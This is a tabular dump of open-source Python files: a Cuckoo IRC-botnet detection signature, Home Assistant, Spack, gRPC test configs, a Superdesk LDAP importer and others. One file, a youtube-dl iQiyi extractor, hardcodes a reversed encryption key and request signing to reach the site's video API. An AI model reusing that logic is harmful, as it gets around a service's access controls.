code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
---|---|---|---|---|---|
# Copyright (C) 2013 Claudio "nex" Guarnieri (@botherder)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class NetworkIRC(Signature):
name = "network_irc"
description = "Connects to an IRC server, possibly part of a botnet"
severity = 3
categories = ["irc"]
authors = ["nex"]
minimum = "0.6"
def run(self):
if "irc" in self.results["network"]:
if len(self.results["network"]["irc"]) > 0:
return True
return False
| 0x00ach/zer0m0n | signatures/network_irc.py | Python | gpl-3.0 | 1,128 |
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('course_action_state.tests.test_rerun_manager', 'common.djangoapps.course_action_state.tests.test_rerun_manager')
from common.djangoapps.course_action_state.tests.test_rerun_manager import *
| eduNEXT/edunext-platform | import_shims/studio/course_action_state/tests/test_rerun_manager.py | Python | agpl-3.0 | 461 |
# Copyright 2008-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further info, check http://launchpad.net/filesync-server
"""Add db_worker_unseen table to keep track of unseen items on the database
side.
"""
SQL = [
"""
CREATE TABLE txlog.db_worker_unseen (
id INTEGER NOT NULL,
worker_id TEXT NOT NULL,
created TIMESTAMP WITHOUT TIME ZONE NOT NULL DEFAULT \
timezone('UTC'::text, now())
)
""",
"""
GRANT SELECT, INSERT, UPDATE, DELETE
ON TABLE txlog.db_worker_unseen
TO storage, webapp
""",
"""
CREATE INDEX db_worker_unseen_idx
ON txlog.db_worker_unseen(worker_id, created, id)
"""
]
def apply(store):
"""Apply the patch"""
for statement in SQL:
store.execute(statement)
| zhsso/ubunto-one | src/backends/db/schemas/txlog/patch_4.py | Python | agpl-3.0 | 1,421 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import logging
from flask import current_app as app
from superdesk.errors import SuperdeskApiError
import superdesk
from .ldap import ADAuth, add_default_values, get_user_query
logger = logging.getLogger(__name__)
class ImportUserProfileFromADCommand(superdesk.Command):
"""
Responsible for importing a user profile from Active Directory (AD) to Mongo.
This command runs on assumption that the user executing this command and
the user whose profile need to be imported need not to be the same. Uses ad_username and ad_password to bind to AD
and then searches for a user identified by username_to_import and if found imports into Mongo.
"""
option_list = (
superdesk.Option('--ad_username', '-adu', dest='ad_username', required=True),
superdesk.Option('--ad_password', '-adp', dest='ad_password', required=True),
superdesk.Option('--username_to_import', '-u', dest='username', required=True),
superdesk.Option('--admin', '-a', dest='admin', required=False),
)
def run(self, ad_username, ad_password, username, admin='false'):
"""
Imports or Updates a User Profile from AD to Mongo.
:param ad_username: Active Directory Username
:param ad_password: Password of Active Directory Username
:param username: Username as in Active Directory whose profile needs to be imported to Superdesk.
:return: User Profile.
"""
# force type conversion to boolean
user_type = 'administrator' if admin is not None and admin.lower() == 'true' else 'user'
# Authenticate and fetch profile from AD
settings = app.settings
ad_auth = ADAuth(settings['LDAP_SERVER'], settings['LDAP_SERVER_PORT'], settings['LDAP_BASE_FILTER'],
settings['LDAP_USER_FILTER'], settings['LDAP_USER_ATTRIBUTES'], settings['LDAP_FQDN'])
user_data = ad_auth.authenticate_and_fetch_profile(ad_username, ad_password, username)
if len(user_data) == 0:
raise SuperdeskApiError.notFoundError('Username not found')
# Check if User Profile already exists in Mongo
user = superdesk.get_resource_service('users').find_one(req=None, **get_user_query(username))
if user:
superdesk.get_resource_service('users').patch(user.get('_id'), user_data)
else:
add_default_values(user_data, username, user_type=user_type)
superdesk.get_resource_service('users').post([user_data])
return user_data
superdesk.command('users:copyfromad', ImportUserProfileFromADCommand())
| sivakuna-aap/superdesk | server/apps/ldap/commands.py | Python | agpl-3.0 | 2,913 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RTriebeard(RPackage):
"""triebeard: 'Radix' Trees in 'Rcpp'"""
homepage = "https://github.com/Ironholds/triebeard/"
url = "https://cloud.r-project.org/src/contrib/triebeard_0.3.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/triebeard"
version('0.3.0', sha256='bf1dd6209cea1aab24e21a85375ca473ad11c2eff400d65c6202c0fb4ef91ec3')
depends_on('r-rcpp', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/r-triebeard/package.py | Python | lgpl-2.1 | 652 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyEpydoc(PythonPackage):
"""Epydoc is a tool for generating API documentation documentation for
Python modules, based on their docstrings."""
pypi = "epydoc/epydoc-3.0.1.tar.gz"
version('3.0.1', sha256='c81469b853fab06ec42b39e35dd7cccbe9938dfddef324683d89c1e5176e48f2')
| LLNL/spack | var/spack/repos/builtin/packages/py-epydoc/package.py | Python | lgpl-2.1 | 516 |
# coding: utf-8
from __future__ import unicode_literals
import hashlib
import math
import random
import time
import uuid
from .common import InfoExtractor
from ..compat import compat_urllib_parse
from ..utils import ExtractorError
class IqiyiIE(InfoExtractor):
IE_NAME = 'iqiyi'
IE_DESC = '爱奇艺'
_VALID_URL = r'http://(?:[^.]+\.)?iqiyi\.com/.+\.html'
_TESTS = [{
'url': 'http://www.iqiyi.com/v_19rrojlavg.html',
'md5': '2cb594dc2781e6c941a110d8f358118b',
'info_dict': {
'id': '9c1fb1b99d192b21c559e5a1a2cb3c73',
'title': '美国德州空中惊现奇异云团 酷似UFO',
'ext': 'f4v',
}
}, {
'url': 'http://www.iqiyi.com/v_19rrhnnclk.html',
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb',
'title': '名侦探柯南第752集',
},
'playlist': [{
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part1',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part2',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part3',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part4',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part5',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part6',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part7',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part8',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}],
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.iqiyi.com/w_19rt6o8t9p.html',
'only_matching': True,
}, {
'url': 'http://www.iqiyi.com/a_19rrhbc6kt.html',
'only_matching': True,
}, {
'url': 'http://yule.iqiyi.com/pcb.html',
'only_matching': True,
}]
_FORMATS_MAP = [
('1', 'h6'),
('2', 'h5'),
('3', 'h4'),
('4', 'h3'),
('5', 'h2'),
('10', 'h1'),
]
@staticmethod
def md5_text(text):
return hashlib.md5(text.encode('utf-8')).hexdigest()
def construct_video_urls(self, data, video_id, _uuid):
def do_xor(x, y):
a = y % 3
if a == 1:
return x ^ 121
if a == 2:
return x ^ 72
return x ^ 103
def get_encode_code(l):
a = 0
b = l.split('-')
c = len(b)
s = ''
for i in range(c - 1, -1, -1):
a = do_xor(int(b[c - i - 1], 16), i)
s += chr(a)
return s[::-1]
def get_path_key(x, format_id, segment_index):
mg = ')(*&^flash@#$%a'
tm = self._download_json(
'http://data.video.qiyi.com/t?tn=' + str(random.random()), video_id,
note='Download path key of segment %d for format %s' % (segment_index + 1, format_id)
)['t']
t = str(int(math.floor(int(tm) / (600.0))))
return self.md5_text(t + mg + x)
video_urls_dict = {}
for format_item in data['vp']['tkl'][0]['vs']:
if 0 < int(format_item['bid']) <= 10:
format_id = self.get_format(format_item['bid'])
else:
continue
video_urls = []
video_urls_info = format_item['fs']
if not format_item['fs'][0]['l'].startswith('/'):
t = get_encode_code(format_item['fs'][0]['l'])
if t.endswith('mp4'):
video_urls_info = format_item['flvs']
for segment_index, segment in enumerate(video_urls_info):
vl = segment['l']
if not vl.startswith('/'):
vl = get_encode_code(vl)
key = get_path_key(
vl.split('/')[-1].split('.')[0], format_id, segment_index)
filesize = segment['b']
base_url = data['vp']['du'].split('/')
base_url.insert(-1, key)
base_url = '/'.join(base_url)
param = {
'su': _uuid,
'qyid': uuid.uuid4().hex,
'client': '',
'z': '',
'bt': '',
'ct': '',
'tn': str(int(time.time()))
}
api_video_url = base_url + vl + '?' + \
compat_urllib_parse.urlencode(param)
js = self._download_json(
api_video_url, video_id,
note='Download video info of segment %d for format %s' % (segment_index + 1, format_id))
video_url = js['l']
video_urls.append(
(video_url, filesize))
video_urls_dict[format_id] = video_urls
return video_urls_dict
def get_format(self, bid):
matched_format_ids = [_format_id for _bid, _format_id in self._FORMATS_MAP if _bid == str(bid)]
return matched_format_ids[0] if len(matched_format_ids) else None
def get_bid(self, format_id):
matched_bids = [_bid for _bid, _format_id in self._FORMATS_MAP if _format_id == format_id]
return matched_bids[0] if len(matched_bids) else None
def get_raw_data(self, tvid, video_id, enc_key, _uuid):
tm = str(int(time.time()))
tail = tm + tvid
param = {
'key': 'fvip',
'src': self.md5_text('youtube-dl'),
'tvId': tvid,
'vid': video_id,
'vinfo': 1,
'tm': tm,
'enc': self.md5_text(enc_key + tail),
'qyid': _uuid,
'tn': random.random(),
'um': 0,
'authkey': self.md5_text(self.md5_text('') + tail),
}
api_url = 'http://cache.video.qiyi.com/vms' + '?' + \
compat_urllib_parse.urlencode(param)
raw_data = self._download_json(api_url, video_id)
return raw_data
def get_enc_key(self, swf_url, video_id):
# TODO: automatic key extraction
# last update at 2015-12-18 for Zombie::bite
enc_key = '8b6b683780897eb8d9a48a02ccc4817d'[::-1]
return enc_key
def _real_extract(self, url):
webpage = self._download_webpage(
url, 'temp_id', note='download video page')
tvid = self._search_regex(
r'data-player-tvid\s*=\s*[\'"](\d+)', webpage, 'tvid')
video_id = self._search_regex(
r'data-player-videoid\s*=\s*[\'"]([a-f\d]+)', webpage, 'video_id')
swf_url = self._search_regex(
r'(http://[^\'"]+MainPlayer[^.]+\.swf)', webpage, 'swf player URL')
_uuid = uuid.uuid4().hex
enc_key = self.get_enc_key(swf_url, video_id)
raw_data = self.get_raw_data(tvid, video_id, enc_key, _uuid)
if raw_data['code'] != 'A000000':
raise ExtractorError('Unable to load data. Error code: ' + raw_data['code'])
if not raw_data['data']['vp']['tkl']:
raise ExtractorError('No support iQiqy VIP video')
data = raw_data['data']
title = data['vi']['vn']
# generate video_urls_dict
video_urls_dict = self.construct_video_urls(
data, video_id, _uuid)
# construct info
entries = []
for format_id in video_urls_dict:
video_urls = video_urls_dict[format_id]
for i, video_url_info in enumerate(video_urls):
if len(entries) < i + 1:
entries.append({'formats': []})
entries[i]['formats'].append(
{
'url': video_url_info[0],
'filesize': video_url_info[-1],
'format_id': format_id,
'preference': int(self.get_bid(format_id))
}
)
for i in range(len(entries)):
self._sort_formats(entries[i]['formats'])
entries[i].update(
{
'id': '%s_part%d' % (video_id, i + 1),
'title': title,
}
)
if len(entries) > 1:
info = {
'_type': 'multi_video',
'id': video_id,
'title': title,
'entries': entries,
}
else:
info = entries[0]
info['id'] = video_id
info['title'] = title
return info
| atomic83/youtube-dl | youtube_dl/extractor/iqiyi.py | Python | unlicense | 9,558 |
"""Support for WeMo switches."""
import asyncio
import logging
from datetime import datetime, timedelta
import requests
import async_timeout
from homeassistant.components.switch import SwitchDevice
from homeassistant.exceptions import PlatformNotReady
from homeassistant.util import convert
from homeassistant.const import (
STATE_OFF, STATE_ON, STATE_STANDBY, STATE_UNKNOWN)
from . import SUBSCRIPTION_REGISTRY
SCAN_INTERVAL = timedelta(seconds=10)
_LOGGER = logging.getLogger(__name__)
ATTR_SENSOR_STATE = 'sensor_state'
ATTR_SWITCH_MODE = 'switch_mode'
ATTR_CURRENT_STATE_DETAIL = 'state_detail'
ATTR_COFFEMAKER_MODE = 'coffeemaker_mode'
MAKER_SWITCH_MOMENTARY = 'momentary'
MAKER_SWITCH_TOGGLE = 'toggle'
WEMO_ON = 1
WEMO_OFF = 0
WEMO_STANDBY = 8
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up discovered WeMo switches."""
from pywemo import discovery
if discovery_info is not None:
location = discovery_info['ssdp_description']
mac = discovery_info['mac_address']
try:
device = discovery.device_from_description(location, mac)
except (requests.exceptions.ConnectionError,
requests.exceptions.Timeout) as err:
_LOGGER.error("Unable to access %s (%s)", location, err)
raise PlatformNotReady
if device:
add_entities([WemoSwitch(device)])
class WemoSwitch(SwitchDevice):
"""Representation of a WeMo switch."""
def __init__(self, device):
"""Initialize the WeMo switch."""
self.wemo = device
self.insight_params = None
self.maker_params = None
self.coffeemaker_mode = None
self._state = None
self._mode_string = None
self._available = True
self._update_lock = None
self._model_name = self.wemo.model_name
self._name = self.wemo.name
self._serialnumber = self.wemo.serialnumber
def _subscription_callback(self, _device, _type, _params):
"""Update the state by the Wemo device."""
_LOGGER.info("Subscription update for %s", self.name)
updated = self.wemo.subscription_update(_type, _params)
self.hass.add_job(
self._async_locked_subscription_callback(not updated))
async def _async_locked_subscription_callback(self, force_update):
"""Handle an update from a subscription."""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
await self._async_locked_update(force_update)
self.async_schedule_update_ha_state()
@property
def unique_id(self):
"""Return the ID of this WeMo switch."""
return self._serialnumber
@property
def name(self):
"""Return the name of the switch if any."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attr = {}
if self.maker_params:
# Is the maker sensor on or off.
if self.maker_params['hassensor']:
# Note a state of 1 matches the WeMo app 'not triggered'!
if self.maker_params['sensorstate']:
attr[ATTR_SENSOR_STATE] = STATE_OFF
else:
attr[ATTR_SENSOR_STATE] = STATE_ON
# Is the maker switch configured as toggle(0) or momentary (1).
if self.maker_params['switchmode']:
attr[ATTR_SWITCH_MODE] = MAKER_SWITCH_MOMENTARY
else:
attr[ATTR_SWITCH_MODE] = MAKER_SWITCH_TOGGLE
if self.insight_params or (self.coffeemaker_mode is not None):
attr[ATTR_CURRENT_STATE_DETAIL] = self.detail_state
if self.insight_params:
attr['on_latest_time'] = \
WemoSwitch.as_uptime(self.insight_params['onfor'])
attr['on_today_time'] = \
WemoSwitch.as_uptime(self.insight_params['ontoday'])
attr['on_total_time'] = \
WemoSwitch.as_uptime(self.insight_params['ontotal'])
attr['power_threshold_w'] = \
convert(
self.insight_params['powerthreshold'], float, 0.0
) / 1000.0
if self.coffeemaker_mode is not None:
attr[ATTR_COFFEMAKER_MODE] = self.coffeemaker_mode
return attr
@staticmethod
def as_uptime(_seconds):
"""Format seconds into uptime string in the format: 00d 00h 00m 00s."""
uptime = datetime(1, 1, 1) + timedelta(seconds=_seconds)
return "{:0>2d}d {:0>2d}h {:0>2d}m {:0>2d}s".format(
uptime.day-1, uptime.hour, uptime.minute, uptime.second)
@property
def current_power_w(self):
"""Return the current power usage in W."""
if self.insight_params:
return convert(
self.insight_params['currentpower'], float, 0.0
) / 1000.0
@property
def today_energy_kwh(self):
"""Return the today total energy usage in kWh."""
if self.insight_params:
miliwatts = convert(self.insight_params['todaymw'], float, 0.0)
return round(miliwatts / (1000.0 * 1000.0 * 60), 2)
@property
def detail_state(self):
"""Return the state of the device."""
if self.coffeemaker_mode is not None:
return self._mode_string
if self.insight_params:
standby_state = int(self.insight_params['state'])
if standby_state == WEMO_ON:
return STATE_ON
if standby_state == WEMO_OFF:
return STATE_OFF
if standby_state == WEMO_STANDBY:
return STATE_STANDBY
return STATE_UNKNOWN
@property
def is_on(self):
"""Return true if switch is on. Standby is on."""
return self._state
@property
def available(self):
"""Return true if switch is available."""
return self._available
@property
def icon(self):
"""Return the icon of device based on its type."""
if self._model_name == 'CoffeeMaker':
return 'mdi:coffee'
return None
def turn_on(self, **kwargs):
"""Turn the switch on."""
self.wemo.on()
def turn_off(self, **kwargs):
"""Turn the switch off."""
self.wemo.off()
async def async_added_to_hass(self):
"""Wemo switch added to HASS."""
# Define inside async context so we know our event loop
self._update_lock = asyncio.Lock()
registry = SUBSCRIPTION_REGISTRY
await self.hass.async_add_job(registry.register, self.wemo)
registry.on(self.wemo, None, self._subscription_callback)
async def async_update(self):
"""Update WeMo state.
Wemo has an aggressive retry logic that sometimes can take over a
minute to return. If we don't get a state after 5 seconds, assume the
Wemo switch is unreachable. If update goes through, it will be made
available again.
"""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
try:
with async_timeout.timeout(5):
await asyncio.shield(self._async_locked_update(True))
except asyncio.TimeoutError:
_LOGGER.warning('Lost connection to %s', self.name)
self._available = False
async def _async_locked_update(self, force_update):
"""Try updating within an async lock."""
async with self._update_lock:
await self.hass.async_add_job(self._update, force_update)
def _update(self, force_update):
"""Update the device state."""
try:
self._state = self.wemo.get_state(force_update)
if self._model_name == 'Insight':
self.insight_params = self.wemo.insight_params
self.insight_params['standby_state'] = (
self.wemo.get_standby_state)
elif self._model_name == 'Maker':
self.maker_params = self.wemo.maker_params
elif self._model_name == 'CoffeeMaker':
self.coffeemaker_mode = self.wemo.mode
self._mode_string = self.wemo.mode_string
if not self._available:
_LOGGER.info('Reconnected to %s', self.name)
self._available = True
except AttributeError as err:
_LOGGER.warning("Could not update status for %s (%s)",
self.name, err)
self._available = False
| MartinHjelmare/home-assistant | homeassistant/components/wemo/switch.py | Python | apache-2.0 | 8,674 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
import pygame
from Axon.Component import component
class BasicSprite(pygame.sprite.Sprite, component):
Inboxes=["translation", "imaging","inbox", "control"]
allsprites = []
def __init__(self, imagepath, name, pos = None,border=40):
pygame.sprite.Sprite.__init__(self)
component.__init__(self)
self.imagepath = imagepath
self.image = None
self.original = None
self.rect = None
self.pos = pos
if self.pos == None:
self.pos = [100,100]
self.dir = ""
self.name = name
self.update = self.sprite_logic().next
self.screensize = (924,658)
self.border = border
self.__class__.allsprites.append(self)
def allSprites(klass):
return klass.allsprites
allSprites = classmethod(allSprites)
def sprite_logic(self):
while 1:
yield 1
def main(self):
self.image = pygame.image.load(self.imagepath)
self.original = self.image
self.image = self.original
self.rect = self.image.get_rect()
self.rect.center = self.pos
center = list(self.rect.center)
current = self.image
pos = center
dx,dy = 0,0
d = 10 # Change me to change the velocity of the sprite
while 1:
self.image = current
if self.dataReady("imaging"):
self.image = self.recv("imaging")
current = self.image
if self.dataReady("translation"):
pos = self.recv("translation")
if self.dataReady("inbox"):
event = self.recv("inbox")
if event == "start_up": dy = dy + d
if event == "stop_up": dy = dy - d
if event == "start_down": dy = dy - d
if event == "stop_down": dy = dy + d
if event == "start_right": dx = dx + d
if event == "stop_right": dx = dx - d
if event == "start_left": dx = dx - d
if event == "stop_left": dx = dx + d
if dx !=0 or dy != 0:
self.pos[0] += dx
if self.pos[0] >self.screensize[0]-self.border: self.pos[0] =self.screensize[0]-self.border
if self.pos[1] >self.screensize[1]-self.border: self.pos[1] =self.screensize[1]-self.border
if self.pos[0] <self.border: self.pos[0] = self.border
if self.pos[1] < self.border: self.pos[1] = self.border
self.pos[1] -= dy
self.rect.center = (self.pos)
self.send(self.pos, "outbox")
yield 1
| sparkslabs/kamaelia_ | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/Games4Kids/BasicSprite.py | Python | apache-2.0 | 3,562 |
#!/usr/bin/env python3
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates the appropriate JSON data for LB interop test scenarios."""
import json
import os
import yaml
all_scenarios = []
# TODO(https://github.com/grpc/grpc-go/issues/2347): enable
# client_falls_back_because_no_backends_* scenarios for Java/Go.
# TODO(https://github.com/grpc/grpc-java/issues/4887): enable
# *short_stream* scenarios for Java.
# TODO(https://github.com/grpc/grpc-java/issues/4912): enable
# Java TLS tests involving TLS to the balancer.
def server_sec(transport_sec):
if transport_sec == 'google_default_credentials':
return 'alts', 'alts', 'tls'
return transport_sec, transport_sec, transport_sec
def generate_no_balancer_because_lb_a_record_returns_nx_domain():
all_configs = []
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
config = {
'name':
'no_balancer_because_lb_a_record_returns_nx_domain_%s' %
transport_sec,
'skip_langs': [],
'transport_sec':
transport_sec,
'balancer_configs': [],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_no_balancer_because_lb_a_record_returns_nx_domain()
def generate_no_balancer_because_lb_a_record_returns_no_data():
all_configs = []
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
config = {
'name':
'no_balancer_because_lb_a_record_returns_no_data_%s' %
transport_sec,
'skip_langs': [],
'transport_sec':
transport_sec,
'balancer_configs': [],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
True,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_no_balancer_because_lb_a_record_returns_no_data()
def generate_client_referred_to_backend():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_%s_short_stream_%s' %
(transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [{
'transport_sec': backend_sec,
}],
'fallback_configs': [],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend()
def generate_client_referred_to_backend_fallback_broken():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in ['alts', 'tls', 'google_default_credentials']:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_fallback_broken_%s_short_stream_%s'
% (transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [{
'transport_sec': backend_sec,
}],
'fallback_configs': [{
'transport_sec': 'insecure',
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend_fallback_broken()
def generate_client_referred_to_backend_multiple_backends():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_multiple_backends_%s_short_stream_%s'
% (transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [{
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}],
'fallback_configs': [],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend_multiple_backends()
def generate_client_falls_back_because_no_backends():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = ['go', 'java']
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_falls_back_because_no_backends_%s_short_stream_%s' %
(transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_falls_back_because_no_backends()
def generate_client_falls_back_because_balancer_connection_broken():
all_configs = []
for transport_sec in ['alts', 'tls', 'google_default_credentials']:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs = ['java']
config = {
'name':
'client_falls_back_because_balancer_connection_broken_%s' %
transport_sec,
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': 'insecure',
'short_stream': False,
}],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_falls_back_because_balancer_connection_broken()
def generate_client_referred_to_backend_multiple_balancers():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_multiple_balancers_%s_short_stream_%s'
% (transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
],
'backend_configs': [{
'transport_sec': backend_sec,
},],
'fallback_configs': [],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend_multiple_balancers()
print((yaml.dump({
'lb_interop_test_scenarios': all_scenarios,
})))
| ctiller/grpc | tools/run_tests/lb_interop_tests/gen_build_yaml.py | Python | apache-2.0 | 12,124 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""oslo.i18n integration module.
See http://docs.openstack.org/developer/oslo.i18n/usage.html
"""
import oslo_i18n
